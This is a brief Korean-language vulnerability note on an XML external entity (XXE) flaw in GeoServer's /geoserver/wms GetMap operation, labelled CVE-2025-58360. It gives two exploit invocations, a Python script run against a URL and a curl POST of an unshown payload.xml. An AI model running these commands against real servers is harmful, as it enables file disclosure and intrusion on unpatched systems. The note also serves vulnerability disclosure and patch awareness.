
특정 엔드포인트 /geoserver/wms 작업 GetMap을 통한 XXE - Geoserver
2.26.0 버전부터 2.26.2 미만 및 2.25.6 미만 버전에서 XML 외부 엔티티(XXE) 취약점이 확인되었습니다. 애플리케이션은 특정 엔드포인트 /geoserver/wms의 GetMap 작업을 통해 XML 입력을 수용합니다.

익스플로잇1:
python3 CVE-2025-58360 -u http://example.com
익스플로잇2:
curl -X POST "http://example.com/geoserver/wms?service=WMS&version=1.1.0&request=GetMap&width=100&height=100&format=image/png&bbox=-180,-90,180,90" -H "Content-Type: application/xml" --data-binary @payload.xml -o output.png